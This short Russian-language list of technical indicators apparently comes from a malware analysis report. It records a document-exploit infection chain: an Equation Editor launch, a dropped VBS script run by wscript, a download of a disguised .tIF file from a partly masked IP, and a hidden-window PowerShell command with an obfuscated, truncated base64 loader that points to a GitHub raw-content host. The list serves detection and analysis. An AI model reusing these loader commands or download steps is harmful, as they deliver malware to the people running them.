Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\picturewithgetmebackgreatdayfo.vBS"
- %APPDATA%\picturewithgetmebackgreatdayfo.vbs
- '51.##.251.113':80
- 'ra#.####ubusercontent.com':443
- http://51.##.251.113/650/picturewithgetmebackgreatdayfor.tIF
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysnd... (со скрытым окном)